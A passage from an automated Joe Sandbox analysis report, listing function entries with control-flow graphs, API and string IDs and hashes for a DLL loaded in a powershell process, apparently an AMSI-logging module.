                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE8105A6A18243C6FAA88A35D080EFE27A2EF4D744F541531DD0D87B95CF2DEA46C748
                                                                                                                                                                                                                                                        Function 00007FFB08151150 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 92COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: fwprintf$CurrentProcess$_fread_nolock_invalid_parameter_noinfo_vfwprintf_l
                                                                                                                                                                                                                                                        • String ID: <App>%s</App>$GetLogFile %s$GetLogFile: app is %s$GetLogFile: reusing file %s$Z:\syscalls\amsi%d_%d.amsi.csv
                                                                                                                                                                                                                                                        • API String ID: 3868157968-3731000926
                                                                                                                                                                                                                                                        • Opcode ID: 7235d5ded0ebafc7601d1056be3eef933d6b48ba2410fdb23a0e70ee0441c13a
                                                                                                                                                                                                                                                        • Instruction ID: 7fa1d706a740a1445a11a59a91d4a62401cc14a77b5ddaa2f7318137c092325c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7235d5ded0ebafc7601d1056be3eef933d6b48ba2410fdb23a0e70ee0441c13a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F34170E1A1CB42D1EA51DB75E484B6AB7A0FFC87D4F004135EA4E867A5EE7CD240C748
                                                                                                                                                                                                                                                        Function 00007FFB08151CF0 Relevance: 18.1, APIs: 12, Instructions: 133COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 40 7ffb08151cf0-7ffb08151cf6 41 7ffb08151d31-7ffb08151e88 40->41 42 7ffb08151cf8-7ffb08151cfb 40->42 48 7ffb08151e8e-7ffb08151ea9 call 7ffb0815207c 41->48 49 7ffb08151e8a-7ffb08151e8c 41->49 44 7ffb08151cfd-7ffb08151d00 42->44 45 7ffb08151d25-7ffb08151d5d call 7ffb081521ec 42->45 46 7ffb08151d02-7ffb08151d05 44->46 47 7ffb08151d18 __scrt_dllmain_crt_thread_attach 44->47 58 7ffb08151d62-7ffb08151d64 45->58 52 7ffb08151d11-7ffb08151d16 call 7ffb0815212c 46->52 53 7ffb08151d07-7ffb08151d10 46->53 54 7ffb08151d1d-7ffb08151d24 47->54 60 7ffb08151eab-7ffb08151eb0 call 7ffb08152554 48->60 61 7ffb08151eb5-7ffb08151edc call 7ffb081521a8 call 7ffb081521d8 call 7ffb081523a0 call 7ffb081523c4 48->61 55 7ffb08151ede-7ffb08151eed 49->55 52->54 62 7ffb08151d6d-7ffb08151d82 call 7ffb0815207c 58->62 63 7ffb08151d66-7ffb08151d68 58->63 60->61 61->55 72 7ffb08151d8e-7ffb08151d9f call 7ffb081520ec 62->72 73 7ffb08151d84-7ffb08151d89 call 7ffb08152554 62->73 67 7ffb08151e55-7ffb08151e6a 63->67 80 7ffb08151da1-7ffb08151ddd call 7ffb0815269c call 7ffb08152440 call 7ffb08152504 call 7ffb08152440 call 7ffb08152528 call 7ffb081569c0 72->80 81 7ffb08151e08-7ffb08151e12 call 7ffb081523a0 72->81 73->72 80->81 108 7ffb08151ddf-7ffb08151de6 __scrt_dllmain_after_initialize_c 80->108 81->63 88 7ffb08151e18-7ffb08151e24 call 7ffb08152544 81->88 95 7ffb08151e4a-7ffb08151e50 88->95 96 7ffb08151e26-7ffb08151e30 call 7ffb08152304 88->96 95->67 96->95 102 7ffb08151e32-7ffb08151e45 call 7ffb08152734 96->102 102->95 108->81 109 7ffb08151de8-7ffb08151e05 call 7ffb08156948 108->109 109->81
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3885183344-0
                                                                                                                                                                                                                                                        • Opcode ID: a1f61d81826a6340c3e2b757633c500d71183a57e367b6b2ec14c86420e6c3f4
                                                                                                                                                                                                                                                        • Instruction ID: 7838030a54fb317124964abacc9c3cd226d3919417986f93db6d2e6dd5125783
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a1f61d81826a6340c3e2b757633c500d71183a57e367b6b2ec14c86420e6c3f4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE51A0E2E0C643D5FA56AB35E856FB922A0AF4D384F544035EA4D47297CE3CE785C708
                                                                                                                                                                                                                                                        Function 00007FFB08161A1C Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 112 7ffb08161a1c-7ffb08161a8e call 7ffb08161688 115 7ffb08161a90-7ffb08161a98 call 7ffb08158b30 112->115 116 7ffb08161aa7-7ffb08161ab1 call 7ffb08160410 112->116 121 7ffb08161a9b-7ffb08161aa2 call 7ffb08158b50 115->121 122 7ffb08161acb-7ffb08161b37 CreateFileW 116->122 123 7ffb08161ab3-7ffb08161ac9 call 7ffb08158b30 call 7ffb08158b50 116->123 136 7ffb08161dee-7ffb08161e0a 121->136 124 7ffb08161bbf-7ffb08161bca GetFileType 122->124 125 7ffb08161b3d-7ffb08161b44 122->125 123->121 131 7ffb08161bcc-7ffb08161c07 GetLastError call 7ffb08158ae0 CloseHandle 124->131 132 7ffb08161c1d-7ffb08161c23 124->132 128 7ffb08161b8c-7ffb08161bba GetLastError call 7ffb08158ae0 125->128 129 7ffb08161b46-7ffb08161b4a 125->129 128->121 129->128 134 7ffb08161b4c-7ffb08161b8a CreateFileW 129->134 131->121 147 7ffb08161c0d-7ffb08161c18 call 7ffb08158b50 131->147 139 7ffb08161c2a-7ffb08161c2d 132->139 140 7ffb08161c25-7ffb08161c28 132->140 134->124 134->128 141 7ffb08161c2f 139->141 142 7ffb08161c32-7ffb08161c80 call 7ffb0816032c 139->142 140->142 141->142 150 7ffb08161c82-7ffb08161c84 call 7ffb08161894 142->150 151 7ffb08161c94-7ffb08161cbe call 7ffb081613f4 142->151 147->121 155 7ffb08161c89-7ffb08161c8e 150->155 159 7ffb08161cc0 151->159 160 7ffb08161cd2-7ffb08161d17 151->160 157 7ffb08161c90 155->157 158 7ffb08161cc3-7ffb08161ccd call 7ffb0815aca4 155->158 157->151 158->136 159->158 161 7ffb08161d39-7ffb08161d45 160->161 162 7ffb08161d19-7ffb08161d1d 160->162 165 7ffb08161dec 161->165 166 7ffb08161d4b-7ffb08161d4f 161->166 162->161 164 7ffb08161d1f-7ffb08161d34 162->164 164->161 165->136 166->165 168 7ffb08161d55-7ffb08161d9d CloseHandle CreateFileW 166->168 169 7ffb08161d9f-7ffb08161dcd GetLastError call 7ffb08158ae0 call 7ffb08160540 168->169 170 7ffb08161dd2-7ffb08161de7 168->170 169->170 170->165
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1330151763-0
                                                                                                                                                                                                                                                        • Opcode ID: 9063fe9081ff4b1d586b19ea241e44ffb5934740d535ebcd9c1a7c9e8924f580
                                                                                                                                                                                                                                                        • Instruction ID: 4c37ec7eac7562840aa99bf336a069468a166ea2e707b7c7f4093d797671478c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9063fe9081ff4b1d586b19ea241e44ffb5934740d535ebcd9c1a7c9e8924f580
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88C1DEB7B28A428AEB108B74D441BAC3761FB49BA8F014235DE6E5B7D5DF38D265C304
                                                                                                                                                                                                                                                        Function 00007FFB0816376C Relevance: 10.8, APIs: 7, Instructions: 294COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 175 7ffb0816376c-7ffb08163792 176 7ffb081637ad-7ffb081637b1 175->176 177 7ffb08163794-7ffb081637a8 call 7ffb08158b30 call 7ffb08158b50 175->177 179 7ffb08163b9f-7ffb08163bab call 7ffb08158b30 call 7ffb08158b50 176->179 180 7ffb081637b7-7ffb081637be 176->180 193 7ffb08163bb6 177->193 199 7ffb08163bb1 call 7ffb08158800 179->199 180->179 182 7ffb081637c4-7ffb081637f3 180->182 182->179 185 7ffb081637f9-7ffb08163800 182->185 188 7ffb08163802-7ffb08163814 call 7ffb08158b30 call 7ffb08158b50 185->188 189 7ffb08163819-7ffb0816381c 185->189 188->199 191 7ffb08163822-7ffb08163827 189->191 192 7ffb08163b9b-7ffb08163b9d 189->192 191->192 197 7ffb0816382d-7ffb08163830 191->197 196 7ffb08163bb9-7ffb08163bd0 192->196 193->196 197->188 200 7ffb08163832-7ffb08163858 197->200 199->193 203 7ffb0816385a-7ffb0816385d 200->203 204 7ffb08163874-7ffb0816387c 200->204 206 7ffb0816385f-7ffb08163867 203->206 207 7ffb08163869-7ffb0816386f 203->207 208 7ffb0816387e-7ffb08163895 call 7ffb08158b30 call 7ffb08158b50 call 7ffb08158800 204->208 209 7ffb0816389a-7ffb081638c6 call 7ffb08157a50 call 7ffb08157a10 * 2 204->209 206->207 206->208 210 7ffb08163914-7ffb0816392a 207->210 241 7ffb08163a20 208->241 236 7ffb081638c8-7ffb081638de call 7ffb08158b50 call 7ffb08158b30 209->236 237 7ffb081638e3-7ffb0816390f call 7ffb08162ee0 209->237 215 7ffb0816392c-7ffb08163933 210->215 216 7ffb081639a9-7ffb081639b3 call 7ffb0815fc7c 210->216 215->216 220 7ffb08163935-7ffb08163938 215->220 227 7ffb08163a3e 216->227 228 7ffb081639b9-7ffb081639ce 216->228 220->216 221 7ffb0816393a-7ffb08163952 220->221 221->216 225 7ffb08163954-7ffb0816395f 221->225 225->216 230 7ffb08163961-7ffb08163964 225->230 232 7ffb08163a43-7ffb08163a63 ReadFile 227->232 228->227 233 7ffb081639d0-7ffb081639e2 GetConsoleMode 228->233 230->216 235 7ffb08163966-7ffb0816397f 230->235 238 7ffb08163a69-7ffb08163a71 232->238 239 7ffb08163b65-7ffb08163b6e GetLastError 232->239 233->227 240 7ffb081639e4-7ffb081639ec 233->240 235->216 245 7ffb08163981-7ffb0816398c 235->245 236->241 237->210 238->239 247 7ffb08163a77 238->247 242 7ffb08163b70-7ffb08163b86 call 7ffb08158b50 call 7ffb08158b30 239->242 243 7ffb08163b8b-7ffb08163b8e 239->243 240->232 249 7ffb081639ee-7ffb08163a11 ReadConsoleW 240->249 244 7ffb08163a23-7ffb08163a2d call 7ffb08157a10 241->244 242->241 253 7ffb08163a19-7ffb08163a1b call 7ffb08158ae0 243->253 254 7ffb08163b94-7ffb08163b96 243->254 244->196 245->216 252 7ffb0816398e-7ffb08163991 245->252 256 7ffb08163a7e-7ffb08163a93 247->256 258 7ffb08163a32-7ffb08163a3c 249->258 259 7ffb08163a13 GetLastError 249->259 252->216 263 7ffb08163993-7ffb081639a4 252->263 253->241 254->244 256->244 265 7ffb08163a95-7ffb08163a9d 256->265 258->256 259->253 263->216 268 7ffb08163a9f-7ffb08163abb call 7ffb0816346c 265->268 269 7ffb08163ac7-7ffb08163ace 265->269 277 7ffb08163ac0-7ffb08163ac2 268->277 270 7ffb08163ad0-7ffb08163ae8 269->270 271 7ffb08163b4d-7ffb08163b60 call 7ffb0816323c 269->271 274 7ffb08163b40-7ffb08163b48 270->274 275 7ffb08163aea-7ffb08163aee 270->275 271->277 274->244 278 7ffb08163af3-7ffb08163afc 275->278 277->244 280 7ffb08163afe-7ffb08163b03 278->280 281 7ffb08163b37-7ffb08163b3b 278->281 282 7ffb08163b20-7ffb08163b2c 280->282 283 7ffb08163b05-7ffb08163b08 280->283 281->274 285 7ffb08163b30-7ffb08163b33 282->285 283->282 284 7ffb08163b0a-7ffb08163b0d 283->284 284->282 286 7ffb08163b0f-7ffb08163b1e 284->286 285->278 287 7ffb08163b35 285->287 286->285 287->274
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 35f00da15620fe1123be848648f16ac0cbd0374ad451ae43b43394d17c9651c7
                                                                                                                                                                                                                                                        • Instruction ID: d0f1f2796a5cd06a62032cb8a82b515600cbaf454558489e7a0dc6df071af2ae
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35f00da15620fe1123be848648f16ac0cbd0374ad451ae43b43394d17c9651c7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84C1F3E2A1868689EA608F35D450A7E6B55BF88BC0F594135DEAE033D5CF3CE661C309
                                                                                                                                                                                                                                                        Function 00007FFB081519B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: fwprintf$CallsDisableLibraryThread_vfwprintf_l
                                                                                                                                                                                                                                                        • String ID: DllMain Attach$DllMain Detach
                                                                                                                                                                                                                                                        • API String ID: 3288638067-2504013106
                                                                                                                                                                                                                                                        • Opcode ID: d530fdc731b20891c020b5686129ad20320a7320289c98ee782dc939d9be07af
                                                                                                                                                                                                                                                        • Instruction ID: 5c65a976eb75fb4560f9c91612f493d5ce7355af8b44c27ce60a6a74bc47f423
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d530fdc731b20891c020b5686129ad20320a7320289c98ee782dc939d9be07af
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47210BF591CA42D6E662DB34E444B6AB7A0FF8C384F400135E68D426A9DF7CE784CB48
                                                                                                                                                                                                                                                        Function 00007FFB08160E20 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 308 7ffb08160e20-7ffb08160e45 309 7ffb08160e4e-7ffb08160e51 308->309 310 7ffb08160e47-7ffb08160e49 308->310 312 7ffb08160e72-7ffb08160e9d 309->312 313 7ffb08160e53-7ffb08160e6d call 7ffb08158b30 call 7ffb08158b50 call 7ffb08158800 309->313 311 7ffb081610e9-7ffb08161100 310->311 315 7ffb08160e9f-7ffb08160ea6 312->315 316 7ffb08160ea8-7ffb08160eae 312->316 313->311 315->313 315->316 318 7ffb08160eb0-7ffb08160eb9 call 7ffb08162ee0 316->318 319 7ffb08160ebe-7ffb08160ecc call 7ffb0815fc7c 316->319 318->319 325 7ffb08160ed2-7ffb08160ee3 319->325 326 7ffb08160fd3-7ffb08160fe4 319->326 325->326 328 7ffb08160ee9-7ffb08160efc call 7ffb081595d4 325->328 330 7ffb08161033-7ffb08161058 WriteFile 326->330 331 7ffb08160fe6-7ffb08160feb 326->331 343 7ffb08160efe-7ffb08160f0e 328->343 344 7ffb08160f14-7ffb08160f30 GetConsoleMode 328->344 333 7ffb0816105a-7ffb08161060 GetLastError 330->333 334 7ffb08161063 330->334 335 7ffb0816101f-7ffb0816102c call 7ffb0816099c 331->335 336 7ffb08160fed-7ffb08160ff0 331->336 333->334 339 7ffb08161066 334->339 345 7ffb08161031 335->345 340 7ffb08160ff2-7ffb08160ff5 336->340 341 7ffb0816100b-7ffb0816101d call 7ffb08160bc0 336->341 346 7ffb0816106b 339->346 347 7ffb08161070-7ffb0816107a 340->347 348 7ffb08160ff7-7ffb08161009 call 7ffb08160aa4 340->348 350 7ffb08160fc7-7ffb08160fce 341->350 343->326 343->344 344->326 351 7ffb08160f36-7ffb08160f38 344->351 345->350 346->347 352 7ffb0816107c-7ffb08161081 347->352 353 7ffb081610e4-7ffb081610e7 347->353 348->350 350->346 355 7ffb08160f3a-7ffb08160f3f 351->355 356 7ffb08160fb5-7ffb08160fc2 call 7ffb08160794 351->356 357 7ffb081610b0-7ffb081610c1 352->357 358 7ffb08161083-7ffb08161086 352->358 353->311 355->347 361 7ffb08160f45-7ffb08160f57 355->361 356->350 362 7ffb081610cc-7ffb081610dc call 7ffb08158b50 call 7ffb08158b30 357->362 363 7ffb081610c3-7ffb081610c6 357->363 364 7ffb08161088-7ffb08161098 call 7ffb08158b50 call 7ffb08158b30 358->364 365 7ffb081610a3-7ffb081610ab call 7ffb08158ae0 358->365 361->339 367 7ffb08160f5d-7ffb08160f6e call 7ffb08162f54 361->367 362->353 363->310 363->362 364->365 365->357 378 7ffb08160f70-7ffb08160f7b 367->378 379 7ffb08160fa3-7ffb08160fa9 GetLastError 367->379 382 7ffb08160f7d-7ffb08160f8f call 7ffb08162f54 378->382 383 7ffb08160f98-7ffb08160f9f 378->383 381 7ffb08160fac-7ffb08160fb0 379->381 381->339 382->379 387 7ffb08160f91-7ffb08160f96 382->387 383->381 384 7ffb08160fa1 383->384 384->367 387->383
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 41c9522f1242b42a4022b9257f9060bbe4b89be07365854b878856c9572918f4
                                                                                                                                                                                                                                                        • Instruction ID: 37eca128121079061ff4d025df73b34444fbfcdd5ea759342925a466b6e43546
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41c9522f1242b42a4022b9257f9060bbe4b89be07365854b878856c9572918f4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8881C1A2E18A529EFB109B75D440EBD36A0BF4CB84F444135DE8E63695CF3CE662C718
                                                                                                                                                                                                                                                        Function 00007FFB08153E6C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 388 7ffb08153e6c-7ffb08153e88 389 7ffb08153e9c-7ffb08153ea3 call 7ffb08155df8 388->389 390 7ffb08153e8a-7ffb08153e9a call 7ffb08158b50 call 7ffb08158800 388->390 396 7ffb08153ead-7ffb08153eb2 389->396 397 7ffb08153ea5-7ffb08153ea8 389->397 390->397 396->390 400 7ffb08153eb4-7ffb08153ec1 396->400 399 7ffb08154057-7ffb08154066 397->399 401 7ffb08153ec7-7ffb08153eca 400->401 402 7ffb08154054 400->402 403 7ffb08153ed1-7ffb08153ed9 401->403 402->399 404 7ffb0815402c-7ffb08154037 403->404 405 7ffb0815403d 404->405 406 7ffb08153ede-7ffb08153ee6 404->406 407 7ffb08154041-7ffb0815404e 405->407 406->407 408 7ffb08153eec-7ffb08153ef6 406->408 407->402 407->403 409 7ffb08153f07 408->409 410 7ffb08153ef8-7ffb08153f05 408->410 411 7ffb08153f09-7ffb08153f19 409->411 410->411 412 7ffb08153f1f-7ffb08153f21 411->412 413 7ffb08154067-7ffb08154072 call 7ffb08158b50 call 7ffb08158800 411->413 415 7ffb08154020-7ffb08154023 call 7ffb081544f8 412->415 416 7ffb08153f27-7ffb08153f2a 412->416 427 7ffb08154077-7ffb08154079 413->427 424 7ffb08154028-7ffb0815402a 415->424 418 7ffb08153f30-7ffb08153f33 416->418 419 7ffb08154007-7ffb0815401e 416->419 422 7ffb08153fd2-7ffb08153fd7 418->422 423 7ffb08153f39-7ffb08153f3c 418->423 419->404 425 7ffb08154001-7ffb08154005 422->425 426 7ffb08153fd9-7ffb08153fdb 422->426 428 7ffb08153f3e-7ffb08153f41 423->428 429 7ffb08153fa6-7ffb08153faa 423->429 424->404 424->427 425->404 430 7ffb08153ffb-7ffb08153fff 426->430 431 7ffb08153fdd-7ffb08153fdf 426->431 427->399 432 7ffb08153f9d-7ffb08153fa1 428->432 433 7ffb08153f43-7ffb08153f46 428->433 434 7ffb08153fb2-7ffb08153fc3 429->434 435 7ffb08153fac-7ffb08153fb0 429->435 430->404 436 7ffb08153fe1-7ffb08153fe3 431->436 437 7ffb08153ff5-7ffb08153ff9 431->437 432->404 438 7ffb08153f70-7ffb08153f74 433->438 439 7ffb08153f48-7ffb08153f4b 433->439 441 7ffb08153fce-7ffb08153fd0 434->441 442 7ffb08153fc5-7ffb08153fcb 434->442 440 7ffb08153f7a-7ffb08153f82 call 7ffb08153d68 435->440 443 7ffb08153fef-7ffb08153ff3 436->443 444 7ffb08153fe5-7ffb08153fe7 436->444 437->404 445 7ffb08153f87-7ffb08153f9b 438->445 446 7ffb08153f76 438->446 448 7ffb08153f4d-7ffb08153f50 439->448 449 7ffb08153f63-7ffb08153f6b call 7ffb08154708 439->449 440->424 441->424 442->441 443->404 444->404 451 7ffb08153fe9-7ffb08153fed 444->451 445->441 446->440 448->427 453 7ffb08153f56-7ffb08153f5e call 7ffb08154ba4 448->453 449->424 451->404 453->424
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: $*
